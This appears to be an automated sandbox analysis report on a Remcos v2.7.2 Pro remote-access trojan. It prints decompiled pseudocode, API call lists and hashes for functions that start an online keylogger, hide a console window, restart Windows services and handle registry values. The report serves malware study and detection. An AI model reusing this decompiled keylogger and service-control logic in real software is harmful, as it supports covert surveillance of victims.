                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                          • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                        • String ID:
                                        • API String ID: 3444260106-0
                                        • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                        • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004117C7, Relevance: 15.1, APIs: 10, Instructions: 61serviceCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E004117C7(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t12;
				int _t20;
				void* _t23;
				void* _t24;

				_t20 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x11);
				_t24 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
				if(_t23 != 0) {
					if(ControlService(_t23, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t23,  &_v32);
						} while (_v28 != 1);
						_t12 = StartServiceW(_t23, 0, 0);
						asm("sbb eax, eax");
						_t20 = ( ~_t12 & 0x000000fe) + 3;
					} else {
						_t20 = 2;
					}
					CloseServiceHandle(_t24);
					CloseServiceHandle(_t23);
				} else {
					CloseServiceHandle(_t24);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t20;
			}










                                        0x004117d0
                                        0x004117d6
                                        0x004117e4
                                        0x004117e6
                                        0x004117f4
                                        0x004117f8
                                        0x00411812
                                        0x00411818
                                        0x0041181d
                                        0x00411823
                                        0x0041182c
                                        0x00411834
                                        0x0041183b
                                        0x00411814
                                        0x00411814
                                        0x00411814
                                        0x00411844
                                        0x00411847
                                        0x004117fa
                                        0x004117fb
                                        0x004117fb
                                        0x0041184c
                                        0x00411858

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                        • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                        • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                        • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413D3D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E00413D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", "a", __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.2 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                        0x00413d3d
                                        0x00413d49
                                        0x00413d4f
                                        0x00413d57
                                        0x00413d5f
                                        0x00413d63
                                        0x00413d63
                                        0x00413d7c
                                        0x00413d8f
                                        0x00413d95
                                        0x00413d97
                                        0x00413d99
                                        0x00413d9a
                                        0x00413da6
                                        0x00413da8
                                        0x00413db4
                                        0x00413dbe
                                        0x00413dca
                                        0x00413dd3
                                        0x00413dd5
                                        0x00413dd9
                                        0x00413ddd
                                        0x00413de1
                                        0x00413de6
                                        0x00413de9
                                        0x00413df6
                                        0x00413dff
                                        0x00413e01
                                        0x00413e05
                                        0x00413e09
                                        0x00413e0d
                                        0x00413e12
                                        0x00413e15
                                        0x00413e23
                                        0x00413e32

                                        APIs
                                        • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                        • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                        • freopen.MSVCRT ref: 00413D7C
                                        • printf.MSVCRT ref: 00413E25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocConsoleShowWindowfreopenprintf
                                        • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                        • API String ID: 3419900118-1124569734
                                        • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                        • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405BC0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
                                        			E00405BC0(void* __ecx) {
				char _v5;
				char _v6;
				void* _t8;
				void* _t31;

				_push(__ecx);
				_t31 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					 *((char*)(__ecx + 0x3d)) = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
						E00405156(_t31);
						if( *_t31 == 0) {
							CreateThread(0, 0, E0040526A, _t31, 0, 0);
						}
						CreateThread(0, 0, E00405299, _t31, 0, 0);
					}
					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
					 *(_t31 + 0x28) = _t8;
				}
				return _t8;
			}







                                        0x00405bc3
                                        0x00405bc6
                                        0x00405bce
                                        0x00405be3
                                        0x00405be7
                                        0x00405bef
                                        0x00405bfe
                                        0x00405c12
                                        0x00405c18
                                        0x00405c29
                                        0x00405c2d
                                        0x00405c34
                                        0x00405c40
                                        0x00405c40
                                        0x00405c4c
                                        0x00405c4c
                                        0x00405c58
                                        0x00405c5a
                                        0x00405c5a
                                        0x00405c61

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000052A8,?,00000000,00000000), ref: 00405C58
                                          • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,?,00000000,00000000), ref: 00405C40
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005299,?,00000000,00000000), ref: 00405C4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                        • String ID: Online Keylogger Started$[INFO]
                                        • API String ID: 3243250608-3343292223
                                        • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                        • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                        • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                        • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E254, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E0040E254(void* __eax, void* __eflags) {
				void* _t7;
				void* _t9;
				void* _t28;

				_t33 = __eflags;
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
				E004017DD(_t28 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}






                                        0x0040e254
                                        0x0040e25d
                                        0x0040e266
                                        0x0040e273
                                        0x0040e27a
                                        0x0040e286
                                        0x0040e28d
                                        0x0040e29e
                                        0x0040e2aa
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                        • String ID: name
                                        • API String ID: 4248281052-1579384326
                                        • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                        • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411AF5, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00411AF5(void* __ecx, WCHAR* _a4) {
				char _v5;
				char _v6;
				void* _t13;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                        0x00411b08
                                        0x00411b1c
                                        0x00411b22
                                        0x00411b41
                                        0x00411b48
                                        0x00411b58

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                        • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                        • Sleep.KERNEL32(00002710), ref: 00411B48
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                        • String ID: Alarm has been triggered!$[ALARM]
                                        • API String ID: 4004766653-1190268461
                                        • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                        • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D8FF, Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0040D8FF() {
				void* _t10;
				char* _t12;
				int _t13;
				char* _t15;
				signed int _t16;
				char* _t18;
				void* _t41;
				void* _t46;
				intOrPtr _t51;

				_t51 =  *0x41bf20; // 0x0
				 *0x41c119 = 0;
				if(_t51 != 0) {
					E004020F4(_t10, 0x41bf20);
				}
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t13 = atoi(_t12);
				E0040F572();
				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t16 = atoi(_t15);
				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
				E004017DD(_t46 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}












                                        0x0040d901
                                        0x0040d907
                                        0x0040d90d
                                        0x0040d914
                                        0x0040d914
                                        0x0040d928
                                        0x0040d933
                                        0x0040d93a
                                        0x0040d947
                                        0x0040d94c
                                        0x0040d957
                                        0x0040d95e
                                        0x0040d965
                                        0x0040d973
                                        0x0040d97a
                                        0x0040d985
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
